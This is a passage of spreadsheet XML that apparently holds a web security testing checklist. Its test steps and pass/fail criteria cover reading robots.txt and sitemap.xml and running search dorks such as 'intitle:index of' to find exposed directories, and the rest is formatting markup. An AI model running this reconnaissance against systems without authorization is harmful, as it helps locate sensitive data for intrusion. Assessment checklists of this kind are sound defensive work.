      <t xml:space="preserve"> Application version and CMS details disclosed.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Architecture is segmented and hardened. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Architecture reveals direct exposure of backend components.</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Request </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>/robots.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> and </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>/sitemap.xml</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>. 2. Analyze listed directories and URLs. 3. Identify restricted areas or internal systems.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Files contain only benign entries. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Sensitive directories or internal APIs exposed.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> No sensitive or administrative paths accessible. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Hidden or backup directories discovered.</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Combine dorks like </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>site:target.com intitle:"index of"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>. 2. Filter and analyze results. 3. Document sensitive or public data leaks.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pass:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> No sensitive data found in indexed results. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Fail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Sensitive files or directories are publicly indexed.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</si>
</sst>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0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="14"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="20"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Arial Unicode MS"/>
    </font>
  </fonts>
  <fills count="5">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="3" tint="0.59999389629810485"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="3" tint="0.79998168889431442"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="13">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFCCCCCC"/>
      </left>
      <right style="medium">
        <color rgb="FFCCCCCC"/>
      </right>
      <top style="medium">
        <color rgb="FFCCCCCC"/>
      </top>
      <bottom style="medium">
        <color rgb="FFCCCCCC"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>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right/>
      <top style="medium">
        <color rgb="FFCCCCCC"/>
      </top>
      <bottom style="medium">
        <color rgb="FFCCCCCC"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="2">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="12" fillId="4" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="61">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="0" xfId="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="6" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="7" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="8" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="6" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="7" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="8" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="6" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="7" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="8" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="4" borderId="6" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="4" borderId="7" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="4" borderId="8" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Accent1" xfId="1" builtinId="29"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="263">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right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>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outline="0">
        <left/>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>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right/>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>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outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right/>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>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4"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="center"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outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right/>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>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right/>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="1"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="left" vertical="top" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b/>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="14"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
      <border diagonalUp="0" diagonalDown="0" outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top/>
        <bottom/>
      </border>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="1"/>
      </font>
      <alignment horizontal="left" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="1"/>
      </font>
      <alignment horizontal="left"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dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="1"/>
      </font>
      <alignment horizontal="left" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="1"/>
      </font>
      <alignment horizontal="left" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="1"/>
      </font>
      <alignment horizontal="left" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b/>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="1"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b/>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>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4"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="0"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bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="14"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="center"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bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="14"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="center"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bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="14"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="center"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bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="14"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="left" vertical="top"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left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right/>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom/>
        <vertical/>
        <horizontal/>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left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom/>
        <vertical/>
        <horizontal/>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left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom/>
        <vertical/>
        <horizontal/>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left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom/>
        <vertical/>
        <horizontal/>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left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom/>
        <vertical/>
        <horizontal/>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left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom/>
        <vertical/>
        <horizontal/>
      </border>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vertical/>
        <horizontal/>
      </border>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left/>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom/>
        <vertical/>
        <horizontal/>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="-0.24994659260841701"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
